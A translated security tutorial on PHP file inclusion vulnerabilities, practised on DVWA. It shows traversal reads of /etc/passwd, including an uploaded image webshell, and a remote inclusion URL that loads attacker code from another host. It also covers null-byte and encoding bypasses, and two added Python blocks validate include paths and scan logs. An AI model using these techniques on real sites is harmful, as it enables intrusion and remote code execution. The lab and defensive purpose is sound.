File inclusion vulnerability summary

2025-04-02 Update From: SLTechnology News&Howtos shulou

Shulou(Shulou.com)06/01 Report--

This experiment is based on DVWA and sqli-labs.

Setting up the experiment platform: download the Wamp integrated environment, then download DVWA and sqli-labs and extract the archives into the wamp\www directory. For installation, just make sure the database name and password match those configured in the Wamp environment.

0x01: File inclusion vulnerability

When the server includes arbitrary files through PHP features (functions), and the source of the file to be included is not strictly filtered, a malicious file can be included; an attacker can then construct that malicious file to achieve malicious ends.

That is the official explanation. In plain terms: through the browser, the URL, or the content of a parameter variable, you can read other files beyond the web root directory by modifying the value of that URL or parameter. It differs from directory browsing, which directly displays the name of every file under the www directory in the browser and lists the directory.

Cause of file inclusion vulnerabilities

Program developers typically write reusable functions into a single file and call that file directly whenever a function is needed, rather than writing it again; this process is generally called file inclusion. Developers want code to be flexible, so they make the included file a variable for dynamic invocation.

But it is precisely this flexibility that lets a client cause a malicious file to be included, giving rise to file inclusion vulnerabilities. Almost all scripting languages provide file inclusion functions, but file inclusion vulnerabilities are common in PHP web applications, while in JSP, ASP and ASP.NET programs they are very rare or even absent; this comes down to language design. Inclusion vulnerabilities are common in PHP, but that doesn't mean other languages are free of them.

Common file inclusion functions

include(): includes the file only when execution reaches the include; if the included file is not found it only generates a warning and the script continues.

require(): includes the file as soon as the program runs; if the included file is not found a fatal error is generated and the script stops.

include_once() and require_once(): these do almost the same as the first two, except that if the file's code has already been included it will not be included again.

LFI (Local File Inclusion): directory traversal can be understood as a local inclusion vulnerability; the verification and exploitation methods are the same.

RFI (Remote File Inclusion): can include a URL on another host, for example by running your own www service and placing a *** file on it; if it is code, it will execute on the target machine. The shell access obtained depends on the account running the www service.

Characteristics of inclusion vulnerabilities: (this is the practical part of the text)

In a page, the value of a variable equals a page file or a fixed value, such as

?page=a.asp

?home=b.html

?file=content

Vulnerability classification

Local file inclusion: can include local files and, when conditions permit, even execute code

Upload an image trojan (a webshell embedded in an image) and then include it

Read sensitive files, read PHP source files

GetShell by including log files

GetShell by including the /proc/self/environ file

Pseudo-protocols: data: or php://input

If phpinfo is available, temporary files can be included.

Remote file inclusion: can execute arbitrary code directly

Requires allow_url_fopen and allow_url_include in php.ini to be On
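A hardened resolver for the page parameter, added here as an example (not the article's or DVWA's code) and written in Python rather than PHP to show the logic: an allowlist plus a canonical-path check, which the allow_url_fopen and allow_url_include settings alone do not give you. The web root and page names are assumed values.

```python
import os

# Constructed example values: an assumed include directory and the pages the
# application is meant to offer. Neither comes from the original article.
WEB_ROOT = os.path.realpath("/var/www/html/dvwa/vulnerabilities/fi")
ALLOWED_PAGES = {"include", "file1", "file2"}

def resolve_include(page: str, base: str = WEB_ROOT, allowed=ALLOWED_PAGES) -> str:
    """Turn the user-controlled 'page' value into a file path the app may include.

    Raises ValueError for anything outside the allowlist, so the tricks the
    article lists (../ traversal, %00 truncation, php:// and data: wrappers,
    http:// remote files) never reach include(). Merely appending ".php",
    the default behaviour described later in the article, would not stop them.
    """
    if "\x00" in page:
        raise ValueError("rejected: embedded NUL byte")
    if "://" in page or page.lower().startswith("data:"):
        raise ValueError("rejected: stream wrapper or remote URL")
    if page not in allowed:
        raise ValueError(f"rejected: {page!r} is not an allowlisted page")
    target = os.path.realpath(os.path.join(base, page + ".php"))
    # Defence in depth: the canonical path must still sit under the base.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("rejected: resolves outside the include directory")
    return target

def classify(page: str) -> str:
    """'allowed' or the rejection reason, for a quick table of sample inputs."""
    try:
        resolve_include(page)
        return "allowed"
    except ValueError as err:
        return str(err)

if __name__ == "__main__":
    # Inputs mirroring the article's own examples plus one legitimate page.
    for sample in ["include", "../../etc/passwd", "/etc/passwd\x00",
                   "php://input", "http://192.168.0.117/a.php"]:
        print(f"{sample!r:32} -> {classify(sample)}")
```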

0x02: Exploiting file inclusion

1. Reading other files on the target machine

If the page parameter is not filtered at all, we can arbitrarily specify other sensitive files on the target host.

In Linux, "." denotes the current directory and ".." the parent directory; each "../" moves up one level, and once you reach the root directory its parent is still the root directory.

Log files are included in the same way, using the usual "../" sequences.

2. Including a working PHP ***

Many places let us upload images, such as avatars and pictures; here we first upload an image whose content is a one-line ***.

Due to upload restrictions, generally only jpg and png image formats can be uploaded, so the code cannot execute on its own; but if we include the image via local file inclusion, the code will be executed. The file does not need a php or asp suffix: as long as the content is code, it will execute.

Then connect with China Chopper (no matter how good your kung fu is, you fear the kitchen knife!)

3. Remote inclusion of a URL and PHP ***

If the target host's "allow_url_fopen" is enabled (it is by default), we have more room to work: we can specify a webshell containing PHP code at another URL and run it directly.

It does not need a php or asp suffix; as long as the content is code, it works.

Less likely to occur than local inclusion, but easier to exploit.

For example, write a one-line piece of code on your own server, then use the remote inclusion vulnerability to include that link:

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://192.168.0.117/a.php

Then, as above, connect with the kitchen knife and get a webshell.

0x03: Inclusion vulnerability bypass techniques

When exploiting the vulnerability we often run into a problem: requesting page=/etc/passwd produces an error that the file /etc/passwd.php cannot be found. This shows that a .php suffix is appended by default. There are several ways to bypass it.

1. Special characters to bypass filtering

(1) By appending "...": once a dot has been added, whatever follows it is ignored.

(2) "%00", the null byte (e.g. /etc/passwd%00): in PHP, when a null byte is encountered, whatever follows it is ignored and only the content before it is used.

(3) "#" to bypass file extension filtering

2. Encoding

URL encoding, double (multi-layer) URL encoding

%2e%2e%2f decodes to: ../

%2e%2e%5c decodes to: ..\

%25%2e%25%2e%255c decodes to: ..\ (Burp's multi-layer encoding and decoding can be used)

Unicode/UTF-8 encoding

..%c0%af decodes to: ../

%c1%9c decodes to: ..\

But whether an encoding works depends on whether the web server can parse it.
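A defender-side check for the encodings listed above, added here as example code (not from the original article): it peels the URL-encoding layers, folds the overlong UTF-8 forms named in the text, and flags inclusion indicators in constructed Apache-style access-log lines. The log lines, client address and double-encoded value are constructed for the example.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit
# Overlong UTF-8 forms of "/" and "\" from the list above, folded to the
# canonical byte so the pattern checks can see them.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}
# Indicator name -> pattern, run against each fully decoded parameter value.
INDICATORS = [
    ("traversal", re.compile(rb"\.\.[/\\]")),
    ("null_byte", re.compile(rb"\x00")),
    ("remote_url", re.compile(rb"^(?:https?|ftp)://", re.I)),
    ("php_wrapper", re.compile(rb"^(?:php|file|expect)://|^data:", re.I)),
    ("sensitive_file", re.compile(rb"/etc/passwd|/proc/self/environ|(?:access|error)\.log", re.I)),
]
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def normalize(raw: bytes, max_rounds: int = 3) -> bytes:
    """Peel up to max_rounds layers of URL encoding, then fold overlong UTF-8."""
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:  # fixpoint: nothing left to decode
            break
        raw = decoded
    for bad, good in OVERLONG.items():
        raw = raw.replace(bad, good)
    return raw

def inspect_request(line: str) -> list[str]:
    """Sorted indicator names found in any query parameter of one log line."""
    m = REQUEST_LINE.search(line)
    if not m:
        return []
    hits = set()
    for pair in urlsplit(m.group(1)).query.split("&"):
        value = normalize(pair.partition("=")[2].encode("latin-1"))
        hits.update(name for name, rx in INDICATORS if rx.search(value))
    return sorted(hits)

def scan_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """(line number, indicators) for every line that triggered an indicator."""
    return [(n, h) for n, line in enumerate(lines, 1) if (h := inspect_request(line))]

# Constructed Apache-style access-log lines (not real traffic); the page
# parameters mirror the encodings and targets discussed in the article.
PREFIX = '203.0.113.5 - - [01/Jun/2019:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page='
SAMPLE_LOG = [PREFIX + q + ' HTTP/1.1" 200 512' for q in [
    "include.php", "%2e%2e%2f%2e%2e%2fetc%2fpasswd", "%252e%252e%255cboot.ini",
    "..%c0%af..%c0%afetc%2fpasswd", "http://192.168.0.117/a.php", "php://input",
    "..%2f..%2flog%2fapache2%2faccess.log%00",
]]
```

Run `scan_log(SAMPLE_LOG)` to see which sample lines trigger which indicators; a benign request such as the first line returns nothing.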

3. Other systems may treat special characters specially, for example:

file.txt ...

file.txt

file .txt """"""""

file.txt
